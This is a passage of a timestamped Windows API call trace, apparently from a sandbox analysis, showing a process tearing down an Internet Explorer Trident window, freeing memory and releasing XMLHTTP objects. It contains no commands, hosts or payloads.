[0186.730] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0186.731] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.731] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0186.731] GetAncestor (hwnd=0x103e0, gaFlags=0x3) returned 0x4031a [0186.731] IsChild (hWndParent=0x103e2, hWnd=0x103e0) returned 0 [0186.731] GetClassNameW (in: hWnd=0x103e0, lpClassName=0x199f20, nMaxCount=26 | out: lpClassName="Internet Explorer_Trident") returned 25 [0186.731] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199e80 | out: lpPoint=0x199e80) returned 1 [0186.731] GetMessageTime () returned 30903796 [0186.731] GetMessagePos () returned 0x11e01d6 [0186.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x103e0, lParam=0x0, plResult=0x199d74 | out: plResult=0x199d74) returned 0x1 [0186.732] NtdllDefWindowProc_W () returned 0x0 [0186.732] GetCurrentThreadId () returned 0xb48 [0186.732] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.732] GetMessageTime () returned 30903796 [0186.732] GetMessagePos () returned 0x11e01d6 [0186.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199a6c | out: plResult=0x199a6c) returned 0x0 [0186.733] GetCurrentThreadId () returned 0xb48 [0186.733] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.734] NtdllDefWindowProc_W () returned 0x0 [0186.735] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.735] NtdllDefWindowProc_W () returned 0x0 [0186.735] GetCapture () returned 0x0 [0186.736] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a138 | out: lpPoint=0x19a138) returned 1 [0186.736] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.736] GetCurrentThreadId () returned 0xb48 [0186.736] GetCurrentThreadId () returned 0xb48 [0186.736] GetFocus () returned 0x103e0 [0186.736] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a127) returned 0 [0186.736] GetCurrentThreadId () returned 0xb48 [0186.736] GetCurrentThreadId () returned 0xb48 [0186.737] GetCurrentThreadId () returned 0xb48 [0186.737] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x19a25c | out: pdwScheme=0x19a25c*=0x12) returned 0x0 [0186.737] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0186.738] GetProcAddress (hModule=0x703b0000, lpProcName=0x20f) returned 0x70428d70 [0186.739] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19a1d0 | out: lpflOldProtect=0x19a1d0*=0x4) returned 1 [0186.779] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0f0 | out: lpPoint=0x19a0f0) returned 1 [0186.779] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.780] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0f0 | out: lpPoint=0x19a0f0) returned 1 [0186.780] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.780] GetCurrentThreadId () returned 0xb48 [0186.780] GetCurrentThreadId () returned 0xb48 [0186.780] IsWinEventHookInstalled (event=0x8001) returned 1 [0186.780] NotifyWinEvent (event=0x8001, hwnd=0x103e2, idObject=0, idChild=0) [0186.781] GetCurrentThreadId () returned 0xb48 [0186.781] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x610430) returned 0x0 [0186.781] ShowWindow (hWnd=0x103e2, nCmdShow=0) returned 1 [0186.781] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.781] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x18, wParam=0x0, lParam=0x0, plResult=0x19a118 | out: plResult=0x19a118) returned 0x1 [0186.781] NtdllDefWindowProc_W () returned 0x0 [0186.781] GetCurrentThreadId () returned 0xb48 [0186.781] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.781] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a2a4*=66530, plResult=0x19a100 | out: plResult=0x19a100) returned 0x1 [0186.781] NtdllDefWindowProc_W () returned 0x0 [0186.781] GetCurrentThreadId () returned 0xb48 [0186.782] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.782] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.782] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x47, wParam=0x0, lParam=0x19a2a4*=66530, plResult=0x19a0fc | out: plResult=0x19a0fc) returned 0x1 [0186.782] NtdllDefWindowProc_W () returned 0x0 [0186.782] GetCurrentThreadId () returned 0xb48 [0186.783] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0186.783] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0186.783] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0186.783] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a028 | out: lpPoint=0x19a028) returned 1 [0186.783] GetMessageTime () returned 30903796 [0186.783] GetMessagePos () returned 0x11e01d6 [0186.783] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199f1c | out: plResult=0x199f1c) returned 0x1 [0186.783] NtdllDefWindowProc_W () returned 0x0 [0186.783] GetCurrentThreadId () returned 0xb48 [0186.783] SetParent (hWndChild=0x103e2, hWndNewParent=0x30316) returned 0x103e0 [0186.784] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.784] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a2ac*=66530, plResult=0x19a108 | out: plResult=0x19a108) returned 0x1 [0186.784] NtdllDefWindowProc_W () returned 0x0 [0186.784] GetCurrentThreadId () returned 0xb48 [0186.784] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.784] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x22, wParam=0x0, lParam=0x0, plResult=0x19a120 | out: plResult=0x19a120) returned 0x1 [0186.785] NtdllDefWindowProc_W () returned 0x0 [0186.785] GetCurrentThreadId () returned 0xb48 [0186.785] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.785] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x47, wParam=0x0, lParam=0x19a2ac*=66530, plResult=0x19a104 | out: plResult=0x19a104) returned 0x1 [0186.785] NtdllDefWindowProc_W () returned 0x0 [0186.785] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0186.785] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x199bfc | out: plResult=0x199bfc) returned 0x1 [0186.785] NtdllDefWindowProc_W () returned 0x0 [0186.785] GetCurrentThreadId () returned 0xb48 [0186.785] GetCurrentThreadId () returned 0xb48 [0186.785] KillTimer (hWnd=0x103e2, uIDEvent=0x1) returned 0 [0186.786] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0186.786] KillTimer (hWnd=0x103e2, uIDEvent=0x1016) returned 0 [0186.786] SetWindowLongW (hWnd=0x103e2, nIndex=-21, dwNewLong=0) returned 13702144 [0186.787] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8038 | out: hHeap=0x5e0000) returned 1 [0186.787] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc610 | out: hHeap=0x5e0000) returned 1 [0186.787] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0186.788] GetProcAddress (hModule=0x76b10000, lpProcName="RevokeDragDrop") returned 0x76b363c0 [0186.789] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19a244 | out: lpflOldProtect=0x19a244*=0x4) returned 1 [0186.789] RevokeDragDrop (hwnd=0x103e2) returned 0x0 [0186.793] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddbf8 | out: hHeap=0x5e0000) returned 1 [0186.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d98 | out: hHeap=0x5e0000) returned 1 [0186.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0186.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0186.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8fe8 | out: hHeap=0x5e0000) returned 1 [0186.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8fd0 | out: hHeap=0x5e0000) returned 1 [0186.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d91f8 | out: hHeap=0x5e0000) returned 1 [0186.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d0018 | out: hHeap=0x5e0000) returned 1 [0186.797] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63eb80 | out: hHeap=0x5e0000) returned 1 [0186.797] GetCurrentThreadId () returned 0xb48 [0186.799] GetCurrentThreadId () returned 0xb48 [0186.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.799] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dca00 | out: hHeap=0x5e0000) returned 1 [0186.799] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8868 | out: hHeap=0x5e0000) returned 1 [0186.800] GetCurrentThreadId () returned 0xb48 [0186.800] GetCurrentThreadId () returned 0xb48 [0186.801] GetCurrentThreadId () returned 0xb48 [0186.801] GetCurrentThreadId () returned 0xb48 [0186.801] free (_Block=0xc5a568) [0186.801] free (_Block=0xc485e8) [0186.801] _flushall () returned 3 [0186.802] free (_Block=0xc5a990) [0186.802] free (_Block=0xc5a920) [0186.802] free (_Block=0xc5a450) [0186.802] free (_Block=0xc5aa70) [0186.802] free (_Block=0xc5a488) [0186.802] free (_Block=0xc5a958) [0186.802] free (_Block=0xc5a840) [0186.802] free (_Block=0xc5a6b8) [0186.802] free (_Block=0xc5a728) [0186.802] free (_Block=0xc5a648) [0186.802] free (_Block=0xc5a680) [0186.802] free (_Block=0xc5a6f0) [0186.802] free (_Block=0xc5a798) [0186.803] VirtualFree (lpAddress=0x9640000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.803] VirtualFree (lpAddress=0x9543000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.804] free (_Block=0xc505d0) [0186.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08000 | out: lpSystemTimeAsFileTime=0xc08000*(dwLowDateTime=0x75f1ce94, dwHighDateTime=0x1d7d80b)) [0186.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08010 | out: lpSystemTimeAsFileTime=0xc08010*(dwLowDateTime=0x75f1dd8c, dwHighDateTime=0x1d7d80b)) [0186.805] ResetWriteWatch (lpBaseAddress=0x7580000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7581000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7582000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7583000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7584000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7585000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7586000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7587000, dwRegionSize=0x1000) returned 0x0 [0186.805] ResetWriteWatch (lpBaseAddress=0x7588000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7589000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758a000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758b000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758c000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758d000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758e000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x758f000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7590000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7591000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7592000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7593000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7594000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7595000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7596000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7597000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7598000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x7599000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x759a000, dwRegionSize=0x1000) returned 0x0 [0186.806] ResetWriteWatch (lpBaseAddress=0x759b000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x759c000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x759d000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x759e000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9530000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9531000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9532000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9533000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9534000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9535000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9536000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9537000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9538000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9539000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953a000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953b000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953c000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953d000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953e000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x953f000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9540000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9541000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9542000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9544000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9545000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9546000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9547000, dwRegionSize=0x1000) returned 0x0 [0186.807] ResetWriteWatch (lpBaseAddress=0x9548000, dwRegionSize=0x1000) returned 0x0 [0186.808] ResetWriteWatch (lpBaseAddress=0x9549000, dwRegionSize=0x1000) returned 0x0 [0186.808] ResetWriteWatch (lpBaseAddress=0x954a000, dwRegionSize=0x1000) returned 0x0 [0186.808] ResetWriteWatch (lpBaseAddress=0x7400000, dwRegionSize=0x20000) returned 0x0 [0186.808] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x75f27a61, dwHighDateTime=0x1d7d80b)) [0186.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x75f27a61, dwHighDateTime=0x1d7d80b)) [0186.810] GetTickCount () returned 0x1d79369 [0186.810] SetEvent (hEvent=0x390) returned 1 [0186.816] SetThreadPriority (hThread=0x394, nPriority=0) returned 1 [0186.816] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x3e8) returned 0x0 [0186.816] SetThreadPriority (hThread=0x394, nPriority=-1) returned 1 [0186.816] VirtualFree (lpAddress=0xa4b1000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.817] VirtualFree (lpAddress=0xa4b2000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.817] VirtualFree (lpAddress=0xa4b3000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.818] VirtualFree (lpAddress=0xa4b4000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.818] VirtualFree (lpAddress=0xa4b5000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.819] VirtualFree (lpAddress=0xa4b6000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.819] VirtualFree (lpAddress=0xa4b7000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.820] VirtualFree (lpAddress=0xa4b8000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.820] VirtualFree (lpAddress=0xa4b9000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.820] VirtualFree (lpAddress=0xa4ba000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.821] VirtualFree (lpAddress=0xa4bb000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.821] VirtualFree (lpAddress=0xa4bc000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.821] VirtualFree (lpAddress=0xa4bd000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.822] VirtualFree (lpAddress=0xa4be000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.822] VirtualFree (lpAddress=0xa4bf000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.823] VirtualFree (lpAddress=0xa4c0000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.823] VirtualFree (lpAddress=0xa4c1000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.823] VirtualFree (lpAddress=0xa4c2000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.824] VirtualFree (lpAddress=0xa4c3000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.824] VirtualFree (lpAddress=0xa4c4000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.825] VirtualFree (lpAddress=0xa4c5000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.825] VirtualFree (lpAddress=0xa4c6000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.826] VirtualFree (lpAddress=0xa4c7000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.826] VirtualFree (lpAddress=0xa4c8000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.826] VirtualFree (lpAddress=0xa4c9000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.827] VirtualFree (lpAddress=0xa4ca000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.828] VirtualFree (lpAddress=0xa4cb000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.828] VirtualFree (lpAddress=0xa4cc000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.828] VirtualFree (lpAddress=0xa4cd000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.843] VirtualFree (lpAddress=0xa4ce000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.843] VirtualFree (lpAddress=0xa4cf000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.845] free (_Block=0xc4fb88) [0186.845] free (_Block=0xc522d8) [0186.845] free (_Block=0xc522a8) [0186.845] VirtualFree (lpAddress=0x759e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.846] VirtualFree (lpAddress=0x758d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.847] VirtualFree (lpAddress=0x7590000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.847] VirtualFree (lpAddress=0x7591000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.848] VirtualFree (lpAddress=0x7593000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.848] VirtualFree (lpAddress=0x7594000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.849] VirtualFree (lpAddress=0x7597000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.850] VirtualFree (lpAddress=0x7416000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.851] VirtualFree (lpAddress=0x7364000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.851] VirtualFree (lpAddress=0x955f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.851] VirtualFree (lpAddress=0x9554000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.852] VirtualFree (lpAddress=0x7365000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.852] VirtualFree (lpAddress=0x955e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.853] VirtualFree (lpAddress=0x954a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.853] VirtualFree (lpAddress=0x758f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.853] VirtualFree (lpAddress=0x7408000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.854] VirtualFree (lpAddress=0x7596000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.854] VirtualFree (lpAddress=0x7592000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.854] VirtualFree (lpAddress=0x7367000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.854] VirtualFree (lpAddress=0x7589000, dwSize=0x3000, dwFreeType=0x4000) returned 1 [0186.855] free (_Block=0xbfcf28) [0186.855] VirtualFree (lpAddress=0x9530000, dwSize=0x5000, dwFreeType=0x4000) returned 1 [0186.855] free (_Block=0xc4b878) [0186.855] GetTickCount () returned 0x1d79397 [0186.855] GetTickCount () returned 0x1d79397 [0186.855] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0186.855] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0186.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08028 | out: lpSystemTimeAsFileTime=0xc08028*(dwLowDateTime=0x75f9a5a2, dwHighDateTime=0x1d7d80b)) [0186.856] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x2 [0186.856] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x1 [0186.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08030 | out: lpSystemTimeAsFileTime=0xc08030*(dwLowDateTime=0x75f9ccb7, dwHighDateTime=0x1d7d80b)) [0186.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x75f9ccb7, dwHighDateTime=0x1d7d80b)) [0186.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x75f9ccb7, dwHighDateTime=0x1d7d80b)) [0186.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08048 | out: lpSystemTimeAsFileTime=0xc08048*(dwLowDateTime=0x75f9ccb7, dwHighDateTime=0x1d7d80b)) [0186.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08050 | out: lpSystemTimeAsFileTime=0xc08050*(dwLowDateTime=0x75f9ccb7, dwHighDateTime=0x1d7d80b)) [0186.857] GetUserDefaultLCID () returned 0x409 [0186.857] GetACP () returned 0x4e4 [0186.857] VirtualFree (lpAddress=0x736b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0186.857] free (_Block=0xc5a610) [0186.857] GetCurrentThreadId () returned 0xb48 [0186.858] free (_Block=0xc52218) [0186.858] free (_Block=0xc50f60) [0186.858] free (_Block=0xc4fbc8) [0186.859] EnableWindow (hWnd=0x70258, bEnable=1) returned 1 [0186.859] NtdllDefWindowProc_W () returned 0x0 [0186.859] DestroyWindow (hWnd=0x103e0) returned 1 [0186.859] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.859] NtdllDefWindowProc_W () returned 0x0 [0186.859] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.860] NtdllDefWindowProc_W () returned 0x0 [0186.873] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.873] IsIconic (hWnd=0x103e0) returned 0 [0186.873] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a1dc | out: lpRect=0x19a1dc) returned 1 [0187.021] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.029] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a1e8 | out: phwnd=0x19a1e8) returned 0x80004005 [0187.029] NtdllDefWindowProc_W () returned 0x1 [0187.031] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.031] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.031] NtdllDefWindowProc_W () returned 0x0 [0187.032] NtdllDefWindowProc_W () returned 0x0 [0187.033] NtdllDefWindowProc_W () returned 0x0 [0187.033] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0187.034] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0187.034] NtdllDefWindowProc_W () returned 0x0 [0187.034] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.034] NtdllDefWindowProc_W () returned 0x0 [0187.035] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.035] NtdllDefWindowProc_W () returned 0x0 [0187.035] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.035] NtdllDefWindowProc_W () returned 0x0 [0187.035] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.037] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0187.037] SetWindowLongW (hWnd=0x103e0, nIndex=-21, dwNewLong=0) returned 13854800 [0187.037] NtdllDefWindowProc_W () returned 0x0 [0187.045] IsWindow (hWnd=0x103e2) returned 1 [0187.045] DestroyWindow (hWnd=0x103e2) returned 1 [0187.045] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 0 [0187.045] NtdllDefWindowProc_W () returned 0x0 [0187.045] NtdllDefWindowProc_W () returned 0x0 [0187.045] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 0 [0187.045] NtdllDefWindowProc_W () returned 0x0 [0187.052] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 0 [0187.052] NtdllDefWindowProc_W () returned 0x0 [0187.052] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 0 [0187.053] NtdllDefWindowProc_W () returned 0x0 [0187.058] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.075] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x610430) returned 0x1 [0187.076] 